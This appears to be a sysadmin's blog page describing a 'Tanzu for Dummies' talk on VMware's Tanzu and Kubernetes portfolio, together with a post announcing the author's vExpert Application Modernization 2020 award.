Modern software development is increasingly moving toward so-called cloud-native architectures. And to run these 'modern-apps', you will likely need containers, a little something called 'Kubernetes', and the infrastructure and integrated tools surrounding it, to bring your application to production.

To answer this need, VMware has introduced Tanzu. But what is VMware Tanzu? Is it a product? Is it a platform? Is it just Kubernetes, or is it more?

In this 'Tanzu for Dummies' session, I will take you on a trip through the VMware Tanzu portfolio and give you ITQ's take on it all!

We will pierce through the branding and acronyms, zoom in on the different Kubernetes flavors and editions that VMware currently has, and look at some of the products and technologies that surround them.I will talk about what these technologies do, where they came from, how VMware is positioning them and how they fit into the greater picture of the Tanzu portfolio. After this session you will leave with a better understanding of how VMware plans to answer the modern-app challenge with Tanzu, and how you can make your own modern applications thrive in the cloud-native world.

What is VMware Tanzu? Is it just Kubernetes, or is it more?

In this ‘Tanzu for Dummies’ session, @thefluffysysop will take you on a trip through the VMware Tanzu portfolio and give you ITQ’s take on it all!https://t.co/EG4InmHXPr #kubernetes #tanzu #vmware #cloudnative pic.twitter.com/73FfmbxsZk

— ITQ (@ITQ) January 21, 2021

VMware vExpert sub-program: Application Modernization 2020

Thefluffyadmin — Fri, 25 Sep 2020 16:22:09 +0000

Very honored to have been accepted into the inaugural VMware vExpert sub-program: Application Modernization 2020

Individuals who are awarded Application Modernization vExpert status are the cream of the crop when it comes to application modernization knowledge, including platforms that modern applications run on. They’re advocates of VMware Tanzu—a portfolio of VMware products and services for modernizing applications and infrastructure—as well as other application platforms running on VMware solutions. vExperts love “giving back” to the community by sharing their knowledge with their peers, whether through blogging or speaking at events like VMworld and VMUG.

test